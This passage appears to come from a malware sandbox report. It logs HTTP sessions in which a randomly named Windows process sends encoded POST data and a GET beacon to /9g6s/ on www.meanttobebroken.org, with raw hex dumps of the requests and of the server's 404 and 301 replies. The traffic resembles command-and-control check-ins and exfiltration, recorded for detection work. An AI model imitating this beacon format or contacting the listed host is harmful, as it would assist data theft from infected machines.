                                                                                                      Data Ascii: _XPD90E=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6Wb0fsuvHrjRF6W1PwdsN8PY78QCFcIss+pQ==
                                                                                                      Oct 22, 2024 09:04:59.705552101 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:04:59 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a2ec2ce44761-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                      Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                      Oct 22, 2024 09:04:59.705627918 CEST212INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                      Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
                                                                                                      Oct 22, 2024 09:04:59.705661058 CEST1236INData Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18
                                                                                                      Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
                                                                                                      Oct 22, 2024 09:04:59.705833912 CEST1236INData Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37
                                                                                                      Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"*o!*1.m=>^t8
                                                                                                      Oct 22, 2024 09:04:59.705869913 CEST1236INData Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09
                                                                                                      Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4|i~|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
                                                                                                      Oct 22, 2024 09:04:59.705905914 CEST636INData Raw: 87 dd d7 d7 29 4b 98 50 50 07 7d bc c7 40 1a a5 bb b1 8c 18 17 7d 9a 25 fb 38 ff 96 d8 d6 f5 82 6e 26 07 03 1b e4 b0 ed 29 81 da 71 55 6a 88 70 ba ac 7e be 64 e8 ed aa fa 79 9b 1a b6 0d 54 c1 f6 58 eb 23 0a 9c 6f 57 da 8e 61 a9 0d 26 ea bb 00 59
                                                                                                      Data Ascii: )KPP}@}%8n&)qUjp~dyTX#oWa&YopGt$,+`PQrD%o>IC{LV)Gq5rW_YVck74|n]-? HYXR4gVYV]N]?A3p~JU;55RuWb$J(d
                                                                                                      Oct 22, 2024 09:04:59.706444979 CEST608INData Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a
                                                                                                      Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY*!hZzP;22$yDX/V22E)d9|dD&#1k(+90FpC"SJ^e]Vu/Gj*x,40v+'`*85vc


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449745141.193.213.10805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:01.581177950 CEST756OUTPOST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 71 4f 68 65 73 4c 66 67 6b 71 5a 46 4b 41 48 49 68 43 6b 4d 47 65 75 39 52 65 63 79 4f 58 4f 56 61 35 70 6d 33 55 6a 66 63 4c 4f 34 34 79 5a 49 39 39 54 74 32 36 5a 73 42 71 32 49 56 4b 65 50 61 6e 4c 36 79 71 64 68 6c 32 6e 70 4e 6c 33 61 37 30 58 6e 4c 5a 63 32 61 38 72 2b 62 6b 31 4b 46 75 61 44 5a 51 36 73 44 75 30 55 45 49 2f 4c 4d 63 77 64 6a 53 42 42 6e 68 6f 64 62 33 6f 52 52 71 61 54 43 71 4d 64 73 72 64 59 66 50 4e 46 4d 6f 46 76 52 33 79 5a 38 51 65 76 6c 70 75 38 67 71 30 50 6a 70 50 56 76 38 54 53 4d 3d
                                                                                                      Data Ascii: _XPD90E=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44qOhesLfgkqZFKAHIhCkMGeu9RecyOXOVa5pm3UjfcLO44yZI99Tt26ZsBq2IVKePanL6yqdhl2npNl3a70XnLZc2a8r+bk1KFuaDZQ6sDu0UEI/LMcwdjSBBnhodb3oRRqaTCqMdsrdYfPNFMoFvR3yZ8Qevlpu8gq0PjpPVv8TSM=
                                                                                                      Oct 22, 2024 09:05:02.264273882 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a2fc3899b793-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                      Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                      Oct 22, 2024 09:05:02.264451027 CEST1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                      Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                                      Oct 22, 2024 09:05:02.264486074 CEST1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                                      Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                                      Oct 22, 2024 09:05:02.264594078 CEST1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                                      Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                                      Oct 22, 2024 09:05:02.264628887 CEST1236INData Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79
                                                                                                      Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
                                                                                                      Oct 22, 2024 09:05:02.264662981 CEST220INData Raw: 46 38 87 fc 81 de 32 cc e3 12 e8 1d 2b a6 1c b6 b0 e8 38 62 c5 b4 87 02 2f 68 a1 87 e0 0e fa 31 4d 91 82 14 08 ce ef f8 1d 81 b5 76 b1 69 35 9d 6e d4 e3 32 ff af a6 07 65 46 9a 0f 59 f9 35 2e 57 9b b4 4c fe 8b 24 af b7 ea 2b b4 57 6a b5 af b7 bc
                                                                                                      Data Ascii: F82+8b/h1Mvi5n2eFY5.WL$+Wj)`fyJ<vR})nmP?TOg48(% |y|'~lU|t ;UM6]8Q97S0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449756141.193.213.10805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:04.117714882 CEST10838OUTPOST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 63 42 61 4f 30 42 54 4e 57 43 7a 75 34 4c 68 68 33 76 30 55 4f 34 7a 71 61 5a 68 34 34 69 4f 69 74 6b 4c 51 68 6b 71 59 46 4b 41 4c 6f 67 6c 6b 4d 47 48 75 39 4a 67 63 79 43 68 4f 51 65 35 6f 45 76 55 6b 74 34 4c 45 34 34 79 55 6f 39 2b 4d 39 33 67 5a 73 52 75 32 4a 6c 4b 65 50 61 6e 4c 35 71 71 4e 44 4e 32 68 70 4e 6d 6a 4b 37 47 63 48 4c 6c 63 31 72 42 72 2b 4f 5a 31 36 6c 75 61 6a 4a 51 34 61 2f 75 37 55 45 4b 2b 4c 4d 36 77 64 66 64 42 42 53 51 6f 63 76 4e 6f 54 4e 71 5a 6b 6e 31 56 64 6b 42 44 2b 48 55 49 47 67 4b 45 4d 6f 77 31 65 6f 4d 49 2f 4a 69 31 64 77 41 34 50 2b 57 52 45 7a 71 4f 48 64 75 41 65 50 58 78 46 64 62 61 79 5a 53 59 6b 4e 6d 68 46 2f 6f 6e 7a 50 52 6f 54 2f 6d 67 4b 2f 58 30 77 66 50 42 6f 61 6d 7a 47 7a 6a 42 4b 64 30 41 43 72 71 4d 62 2b 37 4a 62 59 6a 63 50 37 6b 69 5a 67 43 68 6e 35 38 32 33 51 6d 75 6b 6c 6d 64 64 33 55 66 79 33 51 53 6f 39 50 48 38 77 36 42 36 2b 30 61 44 2b 75 72 37 79 45 6a 61 54 45 37 64 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44iOitkLQhkqYFKALoglkMGHu9JgcyChOQe5oEvUkt4LE44yUo9+M93gZsRu2JlKePanL5qqNDN2hpNmjK7GcHLlc1rBr+OZ16luajJQ4a/u7UEK+LM6wdfdBBSQocvNoTNqZkn1VdkBD+HUIGgKEMow1eoMI/Ji1dwA4P+WREzqOHduAePXxFdbayZSYkNmhF/onzPRoT/mgK/X0wfPBoamzGzjBKd0ACrqMb+7JbYjcP7kiZgChn5823Qmuklmdd3Ufy3QSo9PH8w6B6+0aD+ur7yEjaTE7db2bPxcsAePjj5KQFA6aWgrC7J9q/KwhnTNTgDqNB61Ihnd2iwBRBQF38yKaIp3/i8t1zlME2Dsf8WzGWqBD0T4fLq49MZKTgMoNCzQR4Y/fYaghcCbqmkvgdKjB/Ewz5X0L9WabBNkB/h4a3jo+R0xtD7Ujl/bxdThnRoIbjXSNuMM9AlWeaGpI2+foix6bysiOc5VDkP/a7wyKq0IK0rlkwgIdJh+qAEeMNryQIIe30IVMDJjrkREMwP6ASy81ooweLCO9f4P77bwszKpsJ+jzt8VuO0IH3JJ7iiweT1DMFsa8CJq1Lr5YSq+ZDzjvQBWm/xYnMKVH+7Ky5wXHtoLypTkoD41Fq4CnF6EiCuXdKr/kl1g+ef6S/hMQigYlCaMPsx/5RUJEaSqDl1FOBx7q+FgUzzrH4aLipwCklotbEn7mPyjCPvI1LX6WTAfMx90QBUY9Ph2aCSnAkWkYEei8oolaaq11oTCNdQ7RkYF0UZaJNzqPrH7MB+E7TW0biZxk/YT5hbyd5czulcpgcJZjOfwWEyfKx+2QiD0cl7O+d7AKMH9nQq8Zq2xB26CLilpWD/Q2InLz9Muz+EtiWKpxU2xPyP/AhqMUZw/aL0+7WgAAtkCfxJXBlgvG1BTGqsKkXaSAUwNeRcjSQKeZwbwEyxW+rf6z3yr [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:04.799812078 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:04 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a30bfb3a47a2-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                                      Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                                      Oct 22, 2024 09:05:04.799880981 CEST212INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                                      Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'
                                                                                                      Oct 22, 2024 09:05:04.799891949 CEST1236INData Raw: 1c 17 23 e3 62 66 fc a0 38 dc 4b a3 bb 9c ab 34 08 e4 16 c3 32 7e d0 90 dd af 33 e3 07 e0 61 74 8d bf 93 c1 67 2a 09 74 d2 b8 82 57 97 9c 5e 4d c8 40 68 e0 31 4f 1f 01 36 2c 43 69 dd ad d3 d6 32 62 a2 75 a5 2c 37 ba 86 61 19 05 03 db 50 9c fe 18
                                                                                                      Data Ascii: #bf8K42~3atg*tW^M@h1O6,Ci2bu,7aPyB]%h.l$+R,#2L(ZHNdn-1ScI!1f4'Vu>Gj8saF'z8UAEaraMg,?v
                                                                                                      Oct 22, 2024 09:05:04.800082922 CEST1236INData Raw: 97 be 52 6d ad 4c 4e 8b 9c 38 4e d3 79 43 09 7b 94 9b 33 90 79 6b 14 1d 1f d7 f5 6d 04 4a 3d d0 97 df 7f 39 3e fe f2 fb 2f a5 f7 7d 52 b2 ab c6 3a e8 b7 29 1b 98 2b 73 1b 05 13 f2 23 11 02 27 a4 61 bc 1e 3a 92 7d 56 53 6e c3 7c 6d 34 8c d7 5f 37
                                                                                                      Data Ascii: RmLN8NyC{3ykmJ=9>/}R:)+s#'a:}VSn|m4_7faaZUT972i+w5D{psoh5D`n_q;,NaFrr3cK6 +CVasbxC>9"*o!*1.m=>^t8
                                                                                                      Oct 22, 2024 09:05:04.800095081 CEST1236INData Raw: 6d b5 da 26 6a 2f 98 7b a7 96 67 75 82 bd 7d 34 1e 8b db 3d 54 6c 5a be 1f ac 54 3c 3f 87 a4 e0 9f 07 2b ce 9d b6 75 76 06 d1 fa 18 6b 95 2b 59 44 1e c9 06 8a 6f 4b f1 5e f1 3d 0b 54 7a 0a fc 0a 63 18 ef ce a9 e5 9f 3d 1a 98 24 05 7f a4 11 34 09
                                                                                                      Data Ascii: m&j/{gu}4=TlZT<?+uvk+YDoK^=Tzc=$4(JM5~e4|i~|c-\pv,/vApE.X+x&<"i84HtH"GE94vy]vNZwv:G*
                                                                                                      Oct 22, 2024 09:05:04.800107956 CEST636INData Raw: 87 dd d7 d7 29 4b 98 50 50 07 7d bc c7 40 1a a5 bb b1 8c 18 17 7d 9a 25 fb 38 ff 96 d8 d6 f5 82 6e 26 07 03 1b e4 b0 ed 29 81 da 71 55 6a 88 70 ba ac 7e be 64 e8 ed aa fa 79 9b 1a b6 0d 54 c1 f6 58 eb 23 0a 9c 6f 57 da 8e 61 a9 0d 26 ea bb 00 59
                                                                                                      Data Ascii: )KPP}@}%8n&)qUjp~dyTX#oWa&YopGt$,+`PQrD%o>IC{LV)Gq5rW_YVck74|n]-? HYXR4gVYV]N]?A3p~JU;55RuWb$J(d
                                                                                                      Oct 22, 2024 09:05:04.800118923 CEST608INData Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a
                                                                                                      Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY*!hZzP;22$yDX/V22E)d9|dD&#1k(+90FpC"SJ^e]Vu/Gj*x,40v+'`*85vc


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449771141.193.213.10805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:06.661153078 CEST457OUTGET /9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:07.343538046 CEST648INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 22 Oct 2024 07:05:07 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
